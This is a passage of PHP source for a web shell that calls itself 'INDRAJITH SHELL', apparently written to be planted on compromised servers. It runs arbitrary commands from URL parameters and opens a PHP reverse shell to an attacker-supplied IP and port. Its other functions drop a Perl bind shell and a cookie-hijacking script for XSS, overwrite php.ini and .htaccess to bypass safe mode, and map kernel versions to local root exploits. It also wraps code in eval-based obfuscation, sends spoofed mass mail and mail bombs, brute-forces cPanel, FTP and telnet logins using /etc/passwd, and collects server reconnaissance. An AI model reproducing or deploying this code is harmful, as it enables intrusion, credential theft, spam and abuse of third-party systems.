  707. if(isset($_GET['p_filex']) && isset($_GET['new_perm']))
  708. {
  709. if(chmod($_GET['p_filex'], $_GET['new_perm']) !=FALSE)
  710. {
  711. alert("Succeded. Permission Changed!!!");
  712. }
  713. else
  714. {
  715. alert("Access Denied for This Operation");
  716. }
  717. }
  718. }
  719. function ch_perm_ui()
  720. {
  721. $p_file=$_GET['perm'];
  722. echo "<div id =result><center><h2>New Permission</h2><hr /><p><form method='GET'><input type='hidden' name='path' value=".getcwd()." ><input name='p_filex' type=hidden value={$p_file} >New Permission : <input name='new_perm' isze='40' value=0".substr(sprintf('%o', fileperms($p_file)), -3)."><input type='submit' value=' >> ' /></form></p><p>Full Access : <font color=red>755</font><br />Notice : <font color=red>Don't use Unix Access like 777, 666, etc. Use 755, 655, etc</p><br /><br /><hr /><br /><br /></center></div>";
  723. ch_perm_bg();
  724. }
  725. function mk_file_ui()
  726. {
  727. chdir($_GET['path']);
  728. echo "<div id=result><br /><br /><font color=red><form method='GET'>
  729. <input type='hidden' name='path' value=".getcwd().">
  730. New File Name : <input size='40' name='new_f_name' value=".$_GET['new_file']."></font><br /><br /><hr /><br /><center>
  731. <textarea spellcheck='false' cols='80' rows='25' class=textarea_edit name='n_file_content'></textarea></center><hr />
  732. <input class='input_big' type='submit' value=' Save ' /></form></center></div>";
  733. }
  734. function mk_file_bg()
  735. {
  736. chdir($_GET['path']);
  737. $c_path=$_GET['path'];
  738. $c_file=$_GET['new_f_name'];
  739. $c_file_contents=$_GET['n_file_content'];
  740. $handle=fopen($c_file, "w");
  741. if(!$handle)
  742. {
  743. alert("Permission Denied");
  744. }
  745. else
  746. {
  747. fwrite($handle,$c_file_contents);
  748. alert("Your changes were Successfully Saved!");
  749. }
  750. fclose($handle);
  751. }
  752. function create_dir()
  753. {
  754. chdir($_GET['path']);
  755. $new_dir=$_GET['new_dir'];
  756. if(is_writable($_GET['path']))
  757. {
  758. mkdir($new_dir);
  759. alert("Direcory Created Successfully");
  760. exit;
  761. }
  762. else
  763. {
  764. alert("Access Denied for this Operation");
  765. exit;
  766. }
  767. }
  768. function cmd($cmd)
  769. {
  770. chdir($_GET['path']);
  771. $res="";
  772. if($_GET['cmdexe'])
  773. {
  774. $cmd=$_GET['cmdexe'];
  775. }
  776. if(function_exists('shell_exec'))
  777. {
  778. $res=shell_exec($cmd);
  779. }
  780. else if(function_exists('exec'))
  781. {
  782. exec($cmd,$res);
  783. $res=join("\n",$res);
  784. }
  785. else if(function_exists('system'))
  786. {
  787. ob_start();
  788. system($cmd);
  789. $res = ob_get_contents();
  790. ob_end_clean();
  791. }
  792. elseif(function_exists('passthru'))
  793. {
  794. ob_start();
  795. passthru($cmd);
  796. $res=ob_get_contents();
  797. ob_end_clean();
  798. }
  799. else if(function_exists('proc_open'))
  800. {
  801. $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
  802. $handle = proc_open($cmd ,$descriptorspec , $pipes);
  803. if(is_resource($handle))
  804. {
  805. if(function_exists('fread') && function_exists('feof'))
  806. {
  807. while(!feof($pipes[1]))
  808. {
  809. $res .= fread($pipes[1], 512);
  810. }
  811. }
  812. else if(function_exists('fgets') && function_exists('feof'))
  813. {
  814. while(!feof($pipes[1]))
  815. {
  816. $res .= fgets($pipes[1],512);
  817. }
  818. }
  819. }
  820. pclose($handle);
  821. }
  822.  
  823. else if(function_exists('popen'))
  824. {
  825. $handle = popen($cmd , "r");
  826. if(is_resource($handle))
  827. {
  828. if(function_exists('fread') && function_exists('feof'))
  829. {
  830. while(!feof($handle))
  831. {
  832. $res .= fread($handle, 512);
  833. }
  834. }
  835. else if(function_exists('fgets') && function_exists('feof'))
  836. {
  837. while(!feof($handle))
  838. {
  839. $res .= fgets($handle,512);
  840. }
  841. }
  842. }
  843. pclose($handle);
  844. }
  845.  
  846. $res=wordwrap(htmlspecialchars($res));
  847. if($_GET['cmdexe'])
  848. {
  849. echo "<div id=result><center><font color=green><h2>r00t@TOF:~#</h2></center><hr /><pre>".$res."</font></pre></div>";
  850. }
  851. return $res;
  852. }
  853. function upload_file()
  854. {
  855. chdir($_POST['path']);
  856. if(move_uploaded_file($_FILES['upload_f']['tmp_name'],$_FILES['upload_f']['name']))
  857. {
  858. alert("Uploaded File Successfully");
  859. }
  860. else
  861. {
  862. alert("Access Denied!!!");
  863. }
  864. }
  865.  
  866. function reverse_conn_ui()
  867. {
  868. global $your_ip;
  869. echo "<div id='result'>
  870. <center><h2>Reverse Shell</h2><hr />
  871. <br /><br /><form method='GET'><table class=tbl>
  872. <tr>
  873. <td><select name='rev_option' style='color:green; background-color:black; border:1px solid #666;'>
  874. <option>PHP Reverse Shell</option>
  875. <option>PERL Bind Shell</option>
  876. </select></td></tr><tr>
  877. <td>Your IP : <input name='my_ip' value=".$your_ip.">
  878. PORT : <input name='my_port' value='560'>
  879. <input type='submit' value=' >> ' /></td></tr></form>
  880. <tr></tr>
  881. <tr><td><font color=red>PHP Reverse Shell</font> : <font color=green> nc -l -p <i>port</i></font></td></tr><tr><td><font color=red>PERL Bind Shell</font> : <font color=green> nc <i>server_ip port</i></font></td></tr></table> </div>";
  882. }
  883. function reverse_conn_bg()
  884. {
  885. global $os;
  886. $option=$_REQUEST['rev_option'];
  887. $ip=$_GET['my_ip'];
  888. $port=$_GET['my_port'];
  889. if($option=="PHP Reverse Shell")
  890. {
  891. echo "<div id=result><h2>RESULT</h2><hr /><br />";
  892. function printit ($string)
  893. {
  894. if (!$daemon)
  895. {
  896. print "$string\n";
  897. }
  898. }
  899. $chunk_size = 1400;
  900. $write_a = null;
  901. $error_a = null;
  902. $shell = 'uname -a; w; id; /bin/sh -i';
  903. $daemon = 0;
  904. $debug = 0;
  905. if (function_exists('pcntl_fork'))
  906. {
  907. $pid = pcntl_fork();
  908. if ($pid == -1)
  909. {
  910. printit("ERROR: Can't fork");
  911. exit(1);
  912. }
  913. if ($pid)
  914. {
  915. exit(0);
  916. }
  917. if (posix_setsid() == -1)
  918. {
  919. printit("Error: Can't setsid()");
  920. exit(1);
  921. }
  922. $daemon = 1;
  923. }
  924. else
  925. {
  926. printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
  927. }
  928. chdir("/");
  929. umask(0);
  930. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  931. if (!$sock)
  932. {
  933. printit("$errstr ($errno)");
  934. exit(1);
  935. }
  936. $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
  937. $process = proc_open($shell, $descriptorspec, $pipes);
  938. if (!is_resource($process))
  939. {
  940. printit("ERROR: Can't spawn shell");
  941. exit(1);
  942. }
  943. stream_set_blocking($pipes[0], 0);
  944. stream_set_blocking($pipes[1], 0);
  945. stream_set_blocking($pipes[2], 0);
  946. stream_set_blocking($sock, 0);
  947. printit("<font color=green>Successfully opened reverse shell to $ip:$port </font>");
  948. while (1)
  949. {
  950. if (feof($sock))
  951. {
  952. printit("ERROR: Shell connection terminated");
  953. break;
  954. }
  955. if (feof($pipes[1]))
  956. {
  957. printit("ERROR: Shell process terminated");
  958. break;
  959. }
  960. $read_a = array($sock, $pipes[1], $pipes[2]);
  961. $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  962. if (in_array($sock, $read_a))
  963. {
  964. if ($debug) printit("SOCK READ");
  965. $input = fread($sock, $chunk_size);
  966. if ($debug) printit("SOCK: $input");
  967. fwrite($pipes[0], $input);
  968. }
  969. if (in_array($pipes[1], $read_a))
  970. {
  971. if ($debug) printit("STDOUT READ");
  972. $input = fread($pipes[1], $chunk_size);
  973. if ($debug) printit("STDOUT: $input");
  974. fwrite($sock, $input);
  975. }
  976. if (in_array($pipes[2], $read_a))
  977. {
  978. if ($debug) printit("STDERR READ");
  979. $input = fread($pipes[2], $chunk_size);
  980. if ($debug) printit("STDERR: $input");
  981. fwrite($sock, $input);
  982. }
  983. }
  984. fclose($sock);
  985. fclose($pipes[0]);
  986. fclose($pipes[1]);
  987. fclose($pipes[2]);
  988. proc_close($process);
  989. echo "<br /><br /><hr /><br /><br /></div>";
  990. }
  991. else if($option=="PERL Bind Shell")
  992. {
  993. global $bind_perl, $os;
  994. $pbfl=$bind_perl;
  995. $handlr=fopen("indrajith_perl_bind.pl", "wb");
  996. if($handlr)
  997. {
  998. fwrite($handlr, gzinflate(base64_decode($bind_perl)));
  999. }
  1000. else
  1001. {
  1002. alert("Access Denied for create new file");
  1003. }
  1004. fclose($handlr);
  1005. if(file_exists("indrajith_perl_bind.pl"))
  1006. {
  1007. if($os=="nix")
  1008. {
  1009. cmd("chmod +x indrajith_perl_bind.pl;perl indrajith_perl_bind.pl $port");
  1010. }
  1011. else
  1012. {
  1013. cmd("perl indrajith_perl_bind.pl $port");
  1014. }
  1015. }
  1016. }
  1017. }
  1018.  
  1019. function cookie_jack()
  1020. {
  1021. global $cookie_highjacker;
  1022. echo "<div id=result><center><h2>NOTICE</h2><hr/>";
  1023. if(function_exists('fopen') && function_exists('fwrite'))
  1024. {
  1025. $cook=gzinflate(base64_decode($cookie_highjacker));
  1026. $han_le=fopen("jith_cookie.php", "w+");
  1027. if($han_le)
  1028. {
  1029. fwrite($han_le, $cook);
  1030. echo "Yes... Cookie highjacker is generated.<br /> Name : <a style='color:green;' target=_blank href=jith_cookie.php>jith_cookie.php</a></font>.<br /> Rename it as 404.php or what you like and highjack cookie of your target.<br />It is usefull in XSS<br />It will make a file <font color=red>configuration.txt</font> in this direcory and save the cookie value in it. :p cheers...<br /><br /><hr /><br /><br /></center></div>";
  1031. }
  1032. else
  1033. {
  1034. echo "<font color=red>Sorry... Generate COOKIE HIGHJACKER failed<br /><br /><hr /><br /><br /></center></div>";
  1035. }
  1036. }
  1037. }
  1038.  
  1039.  
  1040.  
  1041. function safe_mode_fuck()
  1042. {
  1043. global $s_php_ini,$s_htaccess,$s_htaccess_pl,$ini_php;
  1044. $path = chdir($_GET['path']);
  1045. chdir($_GET['path']);
  1046. switch($_GET['safe_mode'])
  1047. {
  1048. case "s_php_ini":
  1049. $s_file=$s_php_ini;
  1050. $s_name="php.ini";
  1051. break;
  1052. case "s_htaccess":
  1053. $s_name=".htaccess";
  1054. $s_file=$s_htaccess;
  1055. break;
  1056. case "s_htaccess_pl":
  1057. $s_name=".htaccess";
  1058. $s_file=$s_htaccess_pl;
  1059. break;
  1060. case "s_ini_php":
  1061. $s_name="ini.php";
  1062. $s_file=$ini_php;
  1063. break;
  1064.  
  1065. }
  1066. if(function_exists('fopen')&& function_exists('fwrite'))
  1067. {
  1068. $s_handle=fopen("$s_name", "w+");
  1069. if($s_handle)
  1070. {
  1071. fwrite($s_handle, $s_file);
  1072. alert("Operation Succeed!!!");
  1073. }
  1074. else
  1075. {
  1076. alert("Access Denied!!!");
  1077. }
  1078. fclose($s_handle);
  1079. }
  1080. }
  1081. function safe_mode_fuck_ui()
  1082. {
  1083. global $path;
  1084. $path=getcwd();
  1085. echo "<div id=result><br /><center><h2>Select Your Options</h2><hr />
  1086. <table class=tbl size=10><tr><td><a href=?path={$path}&amp;safe_mode=s_php_ini>PHP.INI</a></td><td><a href=?path={$path}&amp;safe_mode=s_htaccess>.HTACCESS</a></td><td><a href=?path={$path}&amp;safe_mode=s_htaccess_pl>.HTACCESS(perl)</td><td><a href=?path={$path}&amp;safe_mode=s_ini_php>INI.PHP</td></tr></table><br /><br /></div>";
  1087. }
  1088.  
  1089.  
  1090. function AccessDenied()
  1091. {
  1092. global $path, $forbid_dir;
  1093. $path=$_GET['path'];
  1094. chdir($path);
  1095. if(function_exists('fopen') && function_exists('fwrite'))
  1096. {
  1097. $forbid=fopen(".htaccess", "wb");
  1098. if($forbid)
  1099. {
  1100. fwrite($forbid, $forbid_dir);
  1101. alert("Opreation Succeeded");
  1102. }
  1103. else
  1104. {
  1105. alert("Access Denied");
  1106. }
  1107. fclose($forbid);
  1108. }
  1109. }
  1110.  
  1111. function r00t_exploit()
  1112. {
  1113. $kernel = php_uname();
  1114. $r00t_db = array('2.6.19'=>'jessica','2.6.20'=>'jessica','2.6.21'=>'jessica','2.6.22'=>'jessica','2.6.23'=>'jessica, vmsplice','2.6.24'=>'jessica, vmspice','2.6.31'=>'enlightment','2.6.18'=>'brk, ptrace, kmod, brk2','2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip,ptrace');
  1115. foreach($r00t_db as $kern=>$exp)
  1116. {
  1117. if(strstr($kernel, $kern))
  1118. {
  1119. return $exp;
  1120. }
  1121. else
  1122. {
  1123. $exp='<font color="red">Not found.</font>';
  1124. return $exp;
  1125. }
  1126. }
  1127. }
  1128.  
  1129. function php_ende_ui()
  1130. {
  1131. echo "<div id=result><center><h2>PHP ENCODE/DECODE</h2></center><hr /><form method='post'><table class=tbl>
  1132. <tr><td>
  1133. Method : <select name='typed' style='color:green; background-color:black; border:1px solid #666;'><option>Encode</option><option>Decode</decode></select> TYPE : <select name='typenc' style='color:green; background-color:black; border:1px solid #666;'><option>GZINFLATE</option><option>GZUNCOMPRESS</option><option>STR_ROT13</option></tr>
  1134. </td><tr><td><textarea spellcheck='false' class=textarea_edit cols='80' rows='25' name='php_content'>INPUT YOUR CONTENT TO ENCODE/DECODE
  1135.  
  1136. For Encode Input your full source code.
  1137.  
  1138. For Decode Input the encoded part only.</textarea></tr></td></table><hr /><input class='input_big' type='submit' value=' >> ' /><br /><hr /><br /><br /></form></div>";
  1139. }
  1140. function php_ende_bg()
  1141. {
  1142. $meth_d=$_POST['typed'];
  1143. $typ_d=$_POST['typenc'];
  1144. $c_ntent=$_POST['php_content'];
  1145. $c_ntent=$c_ntent;
  1146. switch($meth_d)
  1147. {
  1148. case "Encode":
  1149. switch($typ_d)
  1150. {
  1151. case "GZINFLATE":
  1152. $res_t=base64_encode(gzdeflate(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
  1153. $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzinflate(base64_decode(\"$res_t\"))); ?>";
  1154. break;
  1155. case "GZUNCOMPRESS":
  1156. $res_t=base64_encode(gzcompress(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
  1157. $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzuncompress(base64_decode(\"$res_t\"))); ?>";
  1158. break;
  1159. case "STR_ROT13":
  1160. $res_t=trim(stripslashes($c_ntent.' '),'<?php, ?>');
  1161. $res_t=base64_encode(str_rot13($res_t));
  1162. $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(str_rot13(base64_decode(\"$res_t\"))); ?>";
  1163. break;
  1164. }
  1165. break;
  1166. case "Decode":
  1167. switch($typ_d)
  1168. {
  1169. case "GZINFLATE":
  1170. $res_t=gzinflate(base64_decode($c_ntent));
  1171. break;
  1172. case "GZUNCOMPRESS":
  1173. $res_t=gzuncompress(base64_decode($c_ntent));
  1174. break;
  1175. case "STR_ROT13":
  1176. $res_t=str_rot13(base64_decode($c_ntent));
  1177. break;
  1178. }
  1179. break;
  1180. }
  1181. echo "<div id=result><center><h2>INDRAJITH SHELL</h2><hr /><textarea spellcheck='false' class=textarea_edit cols='80' rows='25'>".htmlspecialchars($res_t)."</textarea></center></div>";
  1182. }
  1183.  
  1184. function massmailer_ui()
  1185. {
  1186. echo "<div id=result><center><h2>MASS MAILER & MAIL BOMBER</h2><hr /><table class=tbl width=40 style='col-width:40'><td><table class=tbl><tr style='float:left;'><td><font color=green size=4>Mass Mail</font></td></tr><form method='POST'><tr style='float:left;'><td> FROM : </td><td><input name='from' size=40 value='ajithkp560@fbi.gov'></td></tr><tr style='float:left;'><td>TO :</td><td><input size=40 name='to_mail' value='ajithkp560@gmail.com,ajithkp560@yahoo.com'></td></tr><tr style='float:left;'><td>Subject :</td><td><input size=40 name='subject_mail' value='Hi, GuyZ'></td></tr><tr style='float:left;'><td><textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='mail_content'>I'm doing massmail :p</textarea></td><td><input class='input_big' type='submit' value=' >> '></td></tr></form></table></td>
  1187. <form method='post'><td> <table class='tbl'><td><font color=green size=4>Mail Bomber</font></td></tr><tr style='float:left;'><td>TO : </td><td><input size=40 name='bomb_to' value='ajithkp560@gmail.com,ajithkp560_mail_bomb@fbi.gov'></td></tr><tr style='float:left;'><td>Subject : </td><td><input size=40 name='bomb_subject' value='Bombing with messages'></td></tr><tr style='float:left;'><td>No. of times</td><td><input size=40 name='bomb_no' value='100'></td></tr><tr style='float:left;'><td> <textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='bmail_content'>I'm doing E-Mail Bombing :p</textarea> </td><td><input class='input_big' type='submit' value=' >> '></td></tr></form></table> </td></tr></table>";
  1188. }
  1189.  
  1190. function massmailer_bg()
  1191. {
  1192. $from=$_POST['from'];
  1193. $to=$_POST['to_mail'];
  1194. $subject=$_POST['subject_mail'];
  1195. $message=$_POST['mail_content'];
  1196. if(function_exists('mail'))
  1197. {
  1198. if(mail($to,$subject,$message,"From:$from"))
  1199. {
  1200. echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Send... :p</font><br /><br /><hr /><br /><br />";
  1201. }
  1202. else
  1203. {
  1204. echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... :(</font><br /><br /><hr /><br /><br />";
  1205. }
  1206. }
  1207. else
  1208. {
  1209. echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... :(</font><br /><br /><hr /><br /><br />";
  1210. }
  1211. }
  1212.  
  1213. function mailbomb_bg()
  1214. {
  1215. $rand=rand(0, 9999999);
  1216. $to=$_POST['bomb_to'];
  1217. $from="president_$rand@whitewhitehouse.gov";
  1218. $subject=$_POST['bomb_subject']." ID ".$rand;
  1219. $times=$_POST['bomb_no'];
  1220. $content=$_POST['bmail_content'];
  1221. if($times=='')
  1222. {
  1223. $times=1000;
  1224. }
  1225. while($times--)
  1226. {
  1227. if(function_exists('mail'))
  1228. {
  1229. if(mail($to,$subject,$message,"From:$from"))
  1230. {
  1231. echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Bombed... :p</font><br /><br /><hr /><br /><br />";
  1232. }
  1233. else
  1234. {
  1235. echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... :(</font><br /><br /><hr /><br /><br />";
  1236. }
  1237. }
  1238. else
  1239. {
  1240. echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... :(</font><br /><br /><hr /><br /><br />";
  1241. }
  1242. }
  1243. }
  1244.  
  1245.  
  1246. /* ----------------------- CPANEL CRACK is Copied from cpanel cracker ----------*/
  1247. /*------------------------ Credit Goes to Them ---------------------------------*/
  1248. function cpanel_check($host,$user,$pass,$timeout)
  1249. {
  1250. set_time_limit(0);
  1251. global $cpanel_port;
  1252. $ch = curl_init();
  1253. curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
  1254. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1255. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1256. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1257. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1258. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1259. $data = curl_exec($ch);
  1260. if ( curl_errno($ch) == 28 )
  1261. {
  1262. print "<b><font color=orange>Error :</font> <font color=red>Connection Timeout. Please Check The Target Hostname .</font></b>";
  1263. exit;
  1264. }
  1265. else if (curl_errno($ch) == 0 )
  1266. {
  1267. print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"orange\">[~]</font></b><font face=\"Tahoma\" style=\"font-size: 9pt\"><b><font color=\"green\">
  1268. Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\" and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
  1269. }
  1270. curl_close($ch);
  1271. }
  1272.  
  1273. function cpanel_crack()
  1274. {
  1275. set_time_limit(0);
  1276. global $os;
  1277. echo "<div id=result>";
  1278. $cpanel_port="2082";
  1279. $connect_timeout=5;
  1280. if(!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype']))
  1281. {
  1282. ?>
  1283. <center>
  1284. <form method=post>
  1285. <table class=tbl>
  1286. <tr>
  1287. <td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td>
  1288. </tr>
  1289. <tr>
  1290. <td align=center>User names</td><td align=center>Password</td>
  1291. </tr>
  1292. <tr>
  1293. <td align=center><textarea spellcheck='false' class=textarea_edit name=username rows=25 cols=35 class=box><?php
  1294. if($os != "win")
  1295. {
  1296. if(@file('/etc/passwd'))
  1297. {
  1298. $users = file('/etc/passwd');
  1299. foreach($users as $user)
  1300. {
  1301. $user = explode(':', $user);
  1302. echo $user[0] . "\n";
  1303. }
  1304. }
  1305. else
  1306. {
  1307. $temp = "";
  1308. $val1 = 0;
  1309. $val2 = 1000;
  1310. for(;$val1 <= $val2;$val1++)
  1311. {
  1312. $uid = @posix_getpwuid($val1);
  1313. if ($uid)
  1314. $temp .= join(':',$uid)."\n";
  1315. }
  1316.  
  1317. $temp = trim($temp);
  1318.  
  1319. if($file5 = fopen("test.txt","w"))
  1320. {
  1321. fputs($file5,$temp);
  1322. fclose($file5);
  1323.  
  1324. $file = fopen("test.txt", "r");
  1325. while(!feof($file))
  1326. {
  1327. $s = fgets($file);
  1328. $matches = array();
  1329. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1330. $matches = str_replace("home/","",$matches[1]);
  1331. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1332. continue;
  1333. echo $matches;
  1334. }
  1335. fclose($file);
  1336. }
  1337. }
  1338. }
  1339. ?></textarea></td><td align=center><textarea spellcheck='false' class=textarea_edit name=password rows=25 cols=35 class=box></textarea></td>
  1340. </tr>
  1341. <tr>
  1342. <td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
  1343. </tr>
  1344. <tr>
  1345. <td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td>
  1346. </tr>
  1347. <tr>
  1348. <td align=center colspan=2><input type="submit" value=" Go " class=but></td>
  1349. </tr>
  1350. </table>
  1351. </form>
  1352. </center>
  1353. <?php
  1354. }
  1355. else
  1356. {
  1357. if(empty($_POST['username']) || empty($_POST['password']))
  1358. echo "<center>Please Enter The Users or Password List</center>";
  1359. else
  1360. {
  1361. $userlist=explode("\n",$_POST['username']);
  1362. $passlist=explode("\n",$_POST['password']);
  1363.  
  1364. if($_POST['cracktype'] == "ftp")
  1365. {
  1366. foreach ($userlist as $user)
  1367. {
  1368. $pureuser = trim($user);
  1369. foreach ($passlist as $password )
  1370. {
  1371. $purepass = trim($password);
  1372. ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
  1373. }
  1374. }
  1375. }
  1376. if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet")
  1377. {
  1378. if($cracktype == "telnet")
  1379. {
  1380. $cpanel_port="23";
  1381. }
  1382. else
  1383. $cpanel_port="2082";
  1384. foreach ($userlist as $user)
  1385. {
  1386. $pureuser = trim($user);
  1387. echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>
  1388. Processing user $pureuser ...</font></b><br><br>";
  1389. foreach ($passlist as $password )
  1390. {
  1391. $purepass = trim($password);
  1392. cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
  1393. }
  1394. }
  1395. }
  1396. }
  1397. }
  1398.  
  1399. echo "</div>";
  1400. }
  1401.  
  1402. function get_users()
  1403. {
  1404. $userz = array();
  1405. $user = file("/etc/passwd");
  1406. foreach($user as $userx=>$usersz)
  1407. {
  1408. $userct = explode(":",$usersz);
  1409. array_push($userz,$userct[0]);
  1410. }
  1411. if(!$user)
  1412. {
  1413. if($opd = opendir("/home/"))
  1414. {
  1415. while(($file = readdir($opd))!== false)
  1416. {
  1417. array_push($userz,$file);
  1418. }
  1419. }
  1420. closedir($opd);
  1421. }
  1422. $userz=implode(', ',$userz);
  1423. return $userz;
  1424. }
  1425.  
  1426. function exploit_details()
  1427. {
  1428. global $os;
  1429. echo "<div id=result style='color:green;'><center>
  1430. <h2>Exploit Server Details</h2><hr /><br /><br /><table class=table style='color:green;text-align:center'><tr><td>
  1431. OS: <a style='color:7171C6;text-decoration:none;' target=_blank href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".php_uname(s)."'>".php_uname(s)."</td></tr>
  1432. <tr><td>PHP Version : <a style='color:7171C6;text-decoration:none;' target=_blank href='?phpinfo'>".phpversion().".</td></tr>
  1433. <tr><td>Kernel Release : <font color=7171C6>".php_uname(r)."</font></td></tr>
  1434. <tr><td>Kernel Version : <font color=7171C6>".php_uname(v)."</font></td></td>
  1435. <tr><td>Machine : <font color=7171C6>".php_uname(m)."</font></td</tr>
  1436. <tr><td>Server Software : <font color=7171C6>".$_SERVER['SERVER_SOFTWARE']."</font></td</tr><tr>";
  1437. if(function_exists('apache_get_modules'))
  1438. {
  1439. echo "<tr><td style='text-align:left;'>Loaded Apache modules : <br /><br /><font color=7171C6>";
  1440. echo implode(', ', apache_get_modules());
  1441. echo "</font></tr></td>";
  1442. }
  1443. if($os=='win')
  1444. {
  1445. echo "<tr><td style='text-align:left;'>Account Setting : <font color=7171C6><pre>".cmd('net accounts')."</pre></td></tr>
  1446. <tr><td style='text-align:left'>User Accounts : <font color=7171C6><pre>".cmd('net user')."</pre></td></tr>
  1447. ";
  1448. }
  1449. if($os=='nix')
  1450. {
  1451. echo "<tr><td style='text-align:left'>Distro : <font color=7171C6><pre>".cmd('cat /etc/*-release')."</pre></font></td></tr>
  1452. <tr><td style='text-align:left'>Distr name : <font color=7171C6><pre>".cmd('cat /etc/issue.net')."</pre></font></td></tr>
  1453. <tr><td style='text-align:left'>GCC : <font color=7171C6><pre>".cmd('whereis gcc')."</pre></td></tr>
  1454. <tr><td style='text-align:left'>PERL : <font color=7171C6><pre>".cmd('whereis perl')."</pre></td></tr>
  1455. <tr><td style='text-align:left'>PYTHON : <font color=7171C6><pre>".cmd('whereis python')."</pre></td></tr>
  1456. <tr><td style='text-align:left'>JAVA : <font color=7171C6><pre>".cmd('whereis java')."</pre></td></tr>
  1457. <tr><td style='text-align:left'>APACHE : <font color=7171C6><pre>".cmd('whereis apache')."</pre></td></tr>
  1458. <tr><td style='text-align:left;'>CPU : <br /><br /><pre><font color=7171C6>".cmd('cat /proc/cpuinfo')."</font></pre></td></tr>
  1459. <tr><td style='text-align:left'>RAM : <font color=7171C6><pre>".cmd('free -m')."</pre></td></tr>
  1460. <tr><td style='text-align:left'> User Limits : <br /><br /><font color=7171C6><pre>".cmd('ulimit -a')."</pre></td></tr>";
  1461. $useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  1462. $uze=array();
  1463. foreach($useful as $uzeful)
  1464. {
  1465. if(cmd("which $uzeful"))
  1466. {
  1467. $uze[]=$uzeful;
  1468. }
  1469. }
